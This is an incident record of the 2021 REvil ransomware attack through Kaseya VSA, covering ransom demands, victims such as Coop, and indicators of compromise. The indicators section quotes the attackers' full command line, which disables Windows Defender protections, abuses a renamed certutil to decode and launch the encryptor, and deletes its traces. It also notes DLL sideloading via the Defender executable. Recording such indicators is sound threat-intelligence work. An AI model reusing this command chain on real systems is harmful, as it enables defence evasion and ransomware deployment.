APT Name: REvil – Tactics, Techniques, Procedures
Updates from Organization:
- https://helpdesk.kaseya.com/hc/en-gb/articles/4403440684689
- [Kaseya Ransomware Incident (groupsense.io)](https://www.groupsense.io/resources/keseya-ransomware-incident
- https://siliconangle.com/2021/07/07/victims-targeted-fake-updates-kaseya-allegedly-knew-exploited-vulnerability-april/
- https://www.huntress.com/blog/a-recap-of-events-and-lessons-learned-during-the-kaseya-vsa-supply-chain-attack
Ransomware:
- [x] Yes
- [ ] No
Ransomware Negotiator: Not disclosed
Ransomware Paid:
- 22nd July, 2021: Kaseya spokeswoman Dana Liedholm would not say Thursday how the key was obtained or whether a ransom was paid. She said only that it came from a “trusted third party” and that Kaseya was distributing it to all victims. The cybersecurity firm Emsisoft confirmed that the key worked and was providing support.
- The Russia-linked criminal syndicate that supplied the malware, REvil, disappeared from the internet on July 13.
- Some of the victims in the Kaseya VSA attack were seeing demands for $5 million in ransom
- At least some victims appeared to be getting ransoms set at $45,000
- Then they demanded a lump-sum $70 million to provide one key that would free all the affected firms’ systems. Then they lowered that demand to $50 million.
Date of Compromise: May 2021
Date of Discovered: 2Jul2021
Compromise Title:
Organization Compromised: Multiple
Organization City: Miami
Organization State: Florida
Organization Country: USA
Compromised Infrastructure Location:
- [Azure]
- [AWS]
- [GCP]
- Own Datacenter
- Other
Forensics Organization: FireEye Mandiant IR
How was the compromise accomplished(IOC):
- Notifications indicated the “KElevated######” (SQL User) account performed this action.
- VSA admin user accounts are disabled only moments before ransomware is deployed
- Ransomware encryptor is dropped to c:\kworking\agent.exe
- The VSA procedure is named “Kaseya VSA Agent Hot-fix”
- At least two tasks run the following: “C:\WINDOWS\system32\cmd.exe” /c ping 127.0.0.1 -n 4979 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe
- The encryptor (agent.exe) is signed with a valid digital signature with the following information:
- Name: PB03 TRANSPORT LTD.
- Email: Brouillettebusiness@outlook.com
- CN = Sectigo RSA Code Signing, CAO = Sectigo Limited, L = Salford, S = Greater Manchester, C = GB
- Serial #: 119acead668bad57a48b4f42f294f8f0
- Issuer: https://sectigo.com/
- When agent.exe runs, the following files are dropped into the hardcoded path c:\Windows:
- MsMpEng.exe – the legit Windows Defender executable
- mpsvc.dll – the encryptor payload that is sideloaded by the legit Defender .EXE
What was compromised:
- Voccola said the problem is only affecting its “on-premise” customers, which means organizations running their own data centers. It’s not affecting its cloud-based services running software for customers, though Kaseya also shut down those servers as a precaution, he said.
- The attack involves a Kaseya product called VSA, which among other things lets small and medium size businesses monitor their computer systems remotely, and automatically take care of routine server maintenance and security updates.
Number of records/customers: 200 Customers impacted
Financial Impact: Developing story
Impacted data principals:
- Fewer than 40 customers had been affected by the cyberattack, the company’s CEO told The New York Times, but some of those are managed service providers, which can supply IT tools to hundreds of businesses. The Times said one of Sweden’s largest grocery chains, Coop, had to close at least 800 of its stores due to the attack.
- Coop was infected with ransomware because they use a European online software company, Visma EssCom, that provides services to more than 200 companies in 20 countries. Visma, which didn’t respond to request for comment, warned on its website Saturday that thanks to the attack on Kaseya, many stores that use Visma “cannot charge their customers when the cash registers are infected.” It’s unclear how many other companies were rendered inoperable through Visma.
- Kaseya says more than 40,000 organizations worldwide use at least one of its products, though not necessarily the VSA offering.
- Large New Jersey educational services company, an outpatient surgical center in South Carolina and a mid-size law firm in Florida
Impact to data principals: Systems could be compromised as the intruder can move laterally and infect other systems connected to the network
Impact to data controller: N/A
Court Ruling: N/A